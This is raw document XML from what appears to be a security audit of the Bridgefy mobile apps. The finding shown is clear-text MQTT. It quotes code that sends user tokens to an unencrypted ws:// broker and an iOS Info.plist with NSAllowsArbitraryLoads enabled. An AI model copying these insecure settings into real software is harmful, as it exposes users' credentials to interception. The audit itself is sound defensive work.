          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="6324" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mqtt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>keepAlive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>60 mqtt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mqtt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mqtt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cleanSession </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Framework/MessageManager/build.gradle.kts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buildConfigField</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"String"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MQTT_BASE_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ws://3.131.221.30:8083/mqtt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Framework/MessageManager/src/main/java/me/bridgefy/framewor k/messagemanager/di/MessageManagerModule.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="1511" w:right="1544" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>provideMqttAndroidClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(application:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MqttAndroidClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>clientId = MqttClient.generateClientId()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MqttAndroidClient(application, BuildConfig.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MQTT_BASE_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>clientId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Additionally, please note that current Android and iOS versions forbid clear-text communications by default, hence the above implementation additionally requires the apps to weaken these built-in protections, which they defeat as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/SupportingFiles/Info.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;NSAppTransportSecurity&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NSAllowsArbitraryLoads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NSAllowsArbitraryLoadsForMedia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2160" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
